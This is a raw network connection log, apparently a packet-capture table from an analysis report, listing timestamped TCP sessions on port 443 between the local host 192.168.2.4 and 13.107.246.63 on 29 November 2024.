                                                                                                                                      Nov 29, 2024 23:11:24.702447891 CET4434983113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:24.703057051 CET49831443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:24.703062057 CET4434983113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:24.734709978 CET4434982913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:24.734988928 CET49829443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:24.734996080 CET4434982913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:24.735328913 CET49829443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:24.735332012 CET4434982913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:24.845421076 CET4434983013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:24.846107960 CET49830443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:24.846121073 CET4434983013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:24.846468925 CET49830443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:24.846474886 CET4434983013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:24.944921970 CET4434983213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:24.945559978 CET49832443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:24.945606947 CET4434983213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:24.949035883 CET49832443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:24.949048996 CET4434983213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.022819996 CET4434982813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.022869110 CET4434982813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.022919893 CET49828443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.023062944 CET49828443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.023080111 CET4434982813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.023089886 CET49828443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.023096085 CET4434982813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.025340080 CET49833443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.025373936 CET4434983313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.025445938 CET49833443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.025566101 CET49833443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.025578022 CET4434983313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.146269083 CET4434983113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.146349907 CET4434983113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.146406889 CET49831443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.146496058 CET49831443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.146507025 CET4434983113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.146517992 CET49831443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.146522045 CET4434983113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.148257017 CET49834443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.148287058 CET4434983413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.148355961 CET49834443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.148458958 CET49834443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.148473024 CET4434983413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.179024935 CET4434982913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.179080963 CET4434982913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.179131985 CET49829443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.179234982 CET49829443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.179239988 CET4434982913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.179250956 CET49829443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.179254055 CET4434982913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.180931091 CET49835443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.180943966 CET4434983513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.181008101 CET49835443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.181103945 CET49835443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.181114912 CET4434983513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.289783001 CET4434983013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.289829016 CET4434983013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.289880991 CET49830443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.290033102 CET49830443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.290057898 CET4434983013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.290067911 CET49830443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.290074110 CET4434983013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.292229891 CET49836443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.292277098 CET4434983613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.292330027 CET49836443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.292495966 CET49836443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.292511940 CET4434983613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.422988892 CET4434983213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.423032999 CET4434983213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.423080921 CET49832443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.423224926 CET49832443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.423249960 CET4434983213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.423261881 CET49832443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.423266888 CET4434983213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.426068068 CET49837443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.426085949 CET4434983713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:25.426150084 CET49837443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.426276922 CET49837443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:25.426285982 CET4434983713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:26.749686003 CET4434983313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:26.750277996 CET49833443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:26.750293970 CET4434983313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:26.750721931 CET49833443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:26.750726938 CET4434983313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:26.971256018 CET4434983513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:26.971672058 CET49835443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:26.971688032 CET4434983513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:26.972201109 CET49835443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:26.972209930 CET4434983513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.007829905 CET4434983413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.008559942 CET49834443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.008590937 CET4434983413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.008959055 CET49834443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.008963108 CET4434983413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.071885109 CET4434983613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.072222948 CET49836443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.072244883 CET4434983613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.072609901 CET49836443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.072614908 CET4434983613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.185609102 CET4434983313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.185662031 CET4434983313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.185719013 CET49833443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.185870886 CET49833443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.185885906 CET4434983313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.185899973 CET49833443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.185904026 CET4434983313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.188234091 CET49838443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.188268900 CET4434983813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.188328981 CET49838443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.188421965 CET49838443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.188438892 CET4434983813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.204865932 CET4434983713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.205147982 CET49837443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.205162048 CET4434983713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.205790997 CET49837443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.205796003 CET4434983713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.415503025 CET4434983513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.415549040 CET4434983513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.415596008 CET49835443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.415771008 CET49835443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.415776968 CET4434983513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.415793896 CET49835443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.415798903 CET4434983513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.418246984 CET49839443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.418272972 CET4434983913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.418339968 CET49839443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.418472052 CET49839443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.418483019 CET4434983913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.461945057 CET4434983413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.462030888 CET4434983413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.462085962 CET49834443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.462196112 CET49834443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.462213993 CET4434983413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.462223053 CET49834443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.462228060 CET4434983413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.464463949 CET49840443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.464478970 CET4434984013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.464554071 CET49840443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.464695930 CET49840443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.464706898 CET4434984013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.517951012 CET4434983613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.517997980 CET4434983613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.518045902 CET49836443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.518177986 CET49836443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.518198967 CET4434983613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.518208981 CET49836443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.518214941 CET4434983613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.520097971 CET49841443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.520123005 CET4434984113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.520188093 CET49841443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.520320892 CET49841443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.520334959 CET4434984113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.649164915 CET4434983713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.649209976 CET4434983713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.649274111 CET49837443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.649398088 CET49837443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.649398088 CET49837443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.649405003 CET4434983713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.649411917 CET4434983713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.651045084 CET49842443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.651056051 CET4434984213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:27.651124954 CET49842443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.651220083 CET49842443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:27.651228905 CET4434984213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.036084890 CET4434983813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.036537886 CET49838443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.036569118 CET4434983813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.036974907 CET49838443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.036981106 CET4434983813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.187196970 CET4434983913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.187793016 CET49839443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.187803030 CET4434983913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.188179016 CET49839443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.188184023 CET4434983913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.249273062 CET4434984113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.249573946 CET49841443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.249607086 CET4434984113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.249885082 CET49841443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.249890089 CET4434984113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.315119982 CET4434984013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.315680981 CET49840443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.315697908 CET4434984013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.316087008 CET49840443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.316092968 CET4434984013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.480226040 CET4434983813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.480285883 CET4434983813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.480370045 CET49838443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.480501890 CET49838443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.480520964 CET4434983813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.480530977 CET49838443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.480535984 CET4434983813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.482727051 CET49844443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.482757092 CET4434984413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.482836008 CET49844443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.482948065 CET49844443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.482959032 CET4434984413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.529144049 CET4434984213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.529546976 CET49842443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.529555082 CET4434984213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.529922962 CET49842443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.529927015 CET4434984213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.622744083 CET4434983913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.622793913 CET4434983913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.622857094 CET49839443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.622997046 CET49839443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.623009920 CET4434983913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.623019934 CET49839443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.623024940 CET4434983913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.625400066 CET49845443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.625431061 CET4434984513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.625515938 CET49845443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.625655890 CET49845443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.625674009 CET4434984513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.741822958 CET4434984113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.741877079 CET4434984113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.741926908 CET49841443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.742237091 CET49841443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.742258072 CET4434984113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.742269993 CET49841443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.742275000 CET4434984113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.745399952 CET49846443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.745429039 CET4434984613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.745515108 CET49846443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.745635033 CET49846443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.745646954 CET4434984613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.812781096 CET4434984013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.812869072 CET4434984013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.812953949 CET49840443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.813035011 CET49840443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.813049078 CET4434984013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.813060999 CET49840443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.813065052 CET4434984013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.814990997 CET49847443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.815020084 CET4434984713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.815088034 CET49847443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.815220118 CET49847443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.815246105 CET4434984713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.983494043 CET4434984213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.983546972 CET4434984213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.983597994 CET49842443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.983751059 CET49842443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.983756065 CET4434984213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.983767033 CET49842443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.983769894 CET4434984213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.985757113 CET49848443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.985784054 CET4434984813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:29.985862970 CET49848443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.985981941 CET49848443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:29.985991955 CET4434984813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.328608036 CET4434984413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.329055071 CET49844443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.329067945 CET4434984413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.329473972 CET49844443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.329478025 CET4434984413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.438678980 CET4434984513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.439209938 CET49845443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.439227104 CET4434984513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.439624071 CET49845443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.439634085 CET4434984513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.548851013 CET4434984613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.549377918 CET49846443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.549391985 CET4434984613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.549820900 CET49846443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.549824953 CET4434984613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.782478094 CET4434984413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.782529116 CET4434984413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.782599926 CET49844443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.782785892 CET49844443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.782800913 CET4434984413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.782812119 CET49844443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.782815933 CET4434984413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.785820961 CET49849443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.785846949 CET4434984913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.785932064 CET49849443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.789319992 CET49849443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.789330959 CET4434984913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.882514954 CET4434984513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.882561922 CET4434984513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.882699966 CET49845443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.882864952 CET49845443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.882888079 CET4434984513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.882898092 CET49845443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.882904053 CET4434984513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.883234978 CET4434984813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.883622885 CET49848443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.883646011 CET4434984813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.884036064 CET49848443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.884041071 CET4434984813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.884974957 CET49850443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.884994984 CET4434985013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.885062933 CET49850443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.885201931 CET49850443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.885210991 CET4434985013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.994200945 CET4434984613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.994244099 CET4434984613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.994376898 CET49846443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.994518995 CET49846443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.994533062 CET4434984613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.994543076 CET49846443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.994548082 CET4434984613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.996628046 CET49851443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.996655941 CET4434985113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:31.996736050 CET49851443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.996865988 CET49851443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:31.996877909 CET4434985113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.336951971 CET4434984813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.337002993 CET4434984813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.337064981 CET49848443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.337287903 CET49848443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.337301970 CET4434984813.107.246.63192.168.2.4
